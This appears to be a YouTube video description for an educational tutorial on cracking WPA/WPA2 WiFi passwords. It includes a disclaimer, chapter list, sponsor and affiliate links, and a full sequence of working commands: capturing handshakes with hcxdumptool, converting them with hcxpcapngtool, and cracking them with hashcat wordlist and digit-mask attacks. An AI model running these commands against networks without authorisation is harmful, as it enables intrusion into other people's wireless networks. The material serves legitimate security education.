WiFi WPA/WPA2 vs hashcat and hcxdumptool



WiFi WPA/WPA2 vs hashcat and hcxdumptool

WiFi WPA/WPA2 vs hashcat and hcxdumptool

Big thanks to Cisco Meraki for sponsoring this video! Learn how to secure hybrid networks so you can stop these kinds of attacks: https://davidbombal.wiki/meraki

Apologies for the glitches in this video 😢 …. looks like the export of this video broke…. I had lots of issues uploading the original video to YouTube and had to export again quickly and it looks like something else broke. Hopefully won’t happen again 😅

Disclaimer: This video is for educational purposes only. I own all equipment used for this demonstration. No actual attack took place on any websites. Only use the tools demonstrated in this video on networks you have permission to attack.

// MENU //
0:00 ▶️ Introduction
1:32 ▶️ Software used
2:17 ▶️ WiFi Hardware used
3:15 ▶️ Commands used
4:17 ▶️ Install required software method 1
5:31 ▶️ Install using Github
7:20 ▶️ hcxdumptool demo using first Alfa adapter
9:15 ▶️ Demonstration using second Alfa adapter
11:15 ▶️ Real world example – a warning to all of us
13:45 ▶️ Use hcxpcapngtool to set format correctly
17:24 ▶️ Using hashcat with rockyou wordlist
18:38 ▶️ Using hashcat with GPU and bruteforce

// Previous Videos //
Kali Wifi Adapters: https://youtu.be/5MOsY3VNLK8
Old method using airmon-ng: https://youtu.be/WfYxrLaqlN8
Old method using GPUs: https://youtu.be/J8A8rKFZW-M

// COMMANDS //
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service

sudo hcxdumptool -i wlan0 -o dumpfile.pcapng –active_beacon –enable_status=15

sudo systemctl start wpa_supplicant.service
sudo systemctl start NetworkManager.service

hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng

hashcat -m 22000 hash.hc22000 wordlist.txt

Windows:
hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

hashcat.exe -m 22000 hash.hc22000 -a 3 –increment –increment-min 8 –increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d

// SOCIAL //
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal

// MY STUFF //
Monitor: https://amzn.to/3yyF74Y
More stuff: https://www.amazon.com/shop/davidbombal

// SPONSORS //
Interested in sponsoring my videos? Reach out to my team here: [email protected]

wifi
kali linux
kali wifi
kali
alfa
alfa network
alfa network adapter
wifi password
wpa
wpa2
hashcat
hcxdumptool
linux
hcxdumptool
hcxdumptoll hashcat

Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

#wifi #wpa2 #hashcat .

Comments are closed.